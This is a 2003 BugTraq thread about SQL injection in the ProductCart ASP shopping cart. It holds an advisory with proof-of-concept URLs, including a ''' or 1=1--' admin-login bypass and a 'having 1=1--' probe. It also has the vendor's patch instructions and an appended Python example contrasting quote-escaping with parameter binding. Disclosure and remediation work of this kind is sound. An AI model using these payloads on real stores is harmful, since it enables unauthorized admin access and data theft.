BugTraq
Re: Another ProductCart SQL Injection Vulnerability Jul 07 2003 07:59PM
Massimo Arrigoni (support earlyimpact com)
In-Reply-To: <20030705063915.10225.qmail (at) www.securityfocus (dot) com [email concealed]>

Additional information on how to better protect a ProductCart-powered store, and specifically on how to avoid unauthorized access to stores using a MS Access database, is available at this address:

http://www.earlyimpact.com/pdf/ProductCart_Security_Tips.pdf

In addition, security updates and other support information for ProductCart users are always available at the ProductCart Support Center, located at the following address:

http://www.earlyimpact.com/productcart/support/

If you have any questions, please contact Early Impact at

support (at) earlyimpact (dot) com [email concealed]

The Early Impact Team


>Date: 5 Jul 2003 06:39:15 -0000

>Message-ID: <20030705063915.10225.qmail (at) www.securityfocus (dot) com [email concealed]>


>From: Massimo Arrigoni <support (at) earlyimpact (dot) com [email concealed]>

>To: bugtraq (at) securityfocus (dot) com [email concealed]

>Subject: Re: Another ProductCart SQL Injection Vulnerability

>

>In-Reply-To: <1057289439.3f04f4dfaf159 (at) webmail.bosen (dot) net [email concealed]>

>

>Instructions on how to address this security issue:

>

>-------------------------------------------------------------------

>

>Users of ProductCart v1.5 and before:

>Please contact Early Impact ASAP to update to a later version of ProductCart. Send a message to support (at) earlyimpact (dot) com [email concealed]. The update is free.

>

>-------------------------------------------------------------------

>

>Users of ProductCart v1.6:

>Open the file "pcadmin/login.asp" and replace the following lines:

>

>pIdAdmin=replace(request.querystring("IdAdmin"),"'","''")
>pAdminPassword=enDeCrypt(request.querystring("adminPassword"), scCrypPass)

>

>with

>

>pIdAdmin=replace(request.querystring("IdAdmin"),"'","''")
>pIdAdmin=replace(pIdAdmin,"--","")
>If NOT isNumeric(pIdAdmin) then
>    response.redirect "msg.asp?message=1"
>    response.end
>end if
>pAdminPassword=enDeCrypt(request.querystring("adminPassword"), scCrypPass)

>

>-------------------------------------------------------------------

>

>Users of ProductCart v2:

>Replace "pcadmin/login.asp" with an updated version of this file that you can request immediately by contacting Early Impact at support (at) earlyimpact (dot) com [email concealed]

>

>-------------------------------------------------------------------

>

>We have already notified all ProductCart resellers of the above. We will

>also notify within the next few hours all ProductCart users that have

>purchased the software directly from us.

>

>At Early Impact we are working day and night to make our application as

>secure as it can be. If you have any questions, please contact us at

>support (at) earlyimpact (dot) com [email concealed]

>

>Best Regards,

>

>The Early Impact Team

>

>


>>Message-ID: <1057289439.3f04f4dfaf159 (at) webmail.bosen (dot) net [email concealed]>

>>Date: Fri, 4 Jul 2003 10:30:39 +0700

>>From: Bosen <mobile (at) bosen (dot) net [email concealed]>

>>To: bugs (at) securitytracker (dot) com [email concealed], bugtraq (at) securityfocus (dot) com [email concealed]

>>Subject: Another ProductCart SQL Injection Vulnerability


>>

>>ProductCart SQL Injection Vulnerability

>>________________________________________________________________________________

>>

>>

>>1ndonesian Security Team (1st)

>>http://bosen.net/releases/

>>================================================================================

>>Security Advisory

>>

>>

>>

>>Advisory Name: ProductCart SQL Injection Vulnerability

>> Release Date: 06/20/2003

>> Application:

>> ProductCart v1.5

>> ProductCart v1.5002

>> ProductCart v1.5003

>> ProductCart v1.5003r

>> ProductCart v1.5004

>> ProductCart v1.6b

>> ProductCart v1.6br

>> ProductCart v1.6br001

>> ProductCart v1.6br003

>> ProductCart v1.6b001

>> ProductCart v1.6b002

>> ProductCart v1.6b003

>> ProductCart v1.6002

>> ProductCart v1.6003

>> ProductCart v2

>> ProductCart v2br000

>> Platform: Win32/MSSQL

>> Severity: High

>> BUG Type: SQL Injection

>> Author: Bosen <mobile (at) bosen (dot) net [email concealed]>

>> Discovered by: Bosen <mobile (at) bosen (dot) net [email concealed]>

>>Vendor Status: See below.

>> Vendor URL: http://www.earlyimpact.com/

>> Reference: http://bosen.net/releases/

>>

>>

>>

>>Overview:

>>From the web

>>"ProductCart® is an ASP shopping cart that combines sophisticated ecommerce features with time-saving store management tools and remarkable ease of use."

>>From the author

>>"Even though the application is not Open Source, we can 'debug' the application on the fly. And with SQL Injection we can query some information about the tables and database, even the data itself. With more work this will give the ability to access the admin control panel site."

>>

>>

>>

>>Details:

>>The error messages of the application are handled very well, but not that well, because they still have an XSS injection vulnerability (read my previous advisories). Those error handlers would make exploitation very difficult to do.
>>But not all scripts are handled by those error handler scripts.
>>For example Custva.asp is still vulnerable to SQL Injection.

>>

>>But the worst is the admin control panel, which can be injected with the old famous SQL injection 'or 1=1--', which makes you able to get access into the admin control panel without needing any access.

>>

>>

>>

>>Exploits/POC:

>>file Custva.asp

>>http://<target>/productcart/pc/Custvb.asp?redirectUrl=&Email=%27+having+1%3D1--

>>&_email=email

>>&password=asd&_password=required&Submit.x=33&Submit.y=5&Submit=Submit

>>

>>file login.asp

>>http://<target>/produccart/pdacmin/login.asp?idadmin='' or 1=1--

>>

>>

>>

>>Vendor Response:

>>Contacted. No response yet.

>>

>>

>>

>>Recommendation:

>>No recommendation for this.

>>

>>

>>

>>1ndonesian Security Team (1st) Advisory:

>>http://bosen.net/releases/

>>

>>

>>

>>About 1ndonesian Security Team:

>>1ndonesian Security Team researches and develops intelligent, advanced application security assessment. Based in Indonesia, 1ndonesian Security Team offers best of breed security consulting services, specialising in application, host and network security assessments.

>>

>>1st provides security information and patches for use by the entire 1st community.

>>

>>This information is provided freely to all interested parties and may be redistributed provided that it is not altered in any way, 1st is appropriately credited and the document retains.

>>

>>

>>Greetz to:

>>AresU, TioEuy, sakitjiwa, muthafuka, alphacentury

>>All 1ndonesian Security Team - #hackers (at) austnet (dot) org [email concealed]/centrin.net.id

>>

>>Bosen <mobile (at) bosen (dot) net [email concealed]>

>>======================

>>Original document can be found at http://bosen.net/releases/?id=40

>>

>>

>>

>
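The two lines the vendor's v1.6 fix swaps in pcadmin/login.asp, re-created in Python against an in-memory SQLite table as an added example (this is not ProductCart's code; the table, its contents and the exact query shape are constructed assumptions): doubling single quotes leaves a numeric comparison open to the login.asp value from the advisory, while a strict type check followed by a bound parameter closes it.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the admin table the login page consults."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admins (idAdmin INTEGER, adminPassword TEXT)")
    con.execute("INSERT INTO admins VALUES (1, 'constructed-hash')")
    return con


def admin_rows_before_fix(con, id_admin):
    """Mirrors the line being replaced: only the single quote is doubled, and
    the result is concatenated into a numeric comparison. No quote is needed
    to leave the intended expression, so the escaping does nothing useful."""
    escaped = id_admin.replace("'", "''")
    sql = "SELECT COUNT(*) FROM admins WHERE idAdmin=" + escaped
    return con.execute(sql).fetchone()[0]


def admin_rows_after_fix(con, id_admin):
    """Mirrors the replacement: non-numeric input is rejected before any SQL
    is built (login.asp redirects to msg.asp?message=1 and ends the response;
    here None stands in for that). Decimal digits only, which is stricter
    than VBScript's IsNumeric. The value is then bound as a parameter, the
    general fix that the vendor's type check approximates for an integer
    column; stripping "--" adds nothing once the type check is in place."""
    if not re.fullmatch(r"[0-9]+", id_admin):
        return None
    sql = "SELECT COUNT(*) FROM admins WHERE idAdmin=?"
    return con.execute(sql, (int(id_admin),)).fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    payload = "'' or 1=1--"  # the idadmin value quoted in the advisory above
    # Before: a wrong id matches nothing, but the payload matches every row.
    print(admin_rows_before_fix(db, "2"), admin_rows_before_fix(db, payload))
    # After: a wrong id still matches nothing and the payload is rejected.
    print(admin_rows_after_fix(db, "2"), admin_rows_after_fix(db, payload))
```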

Copyright 2010, SecurityFocus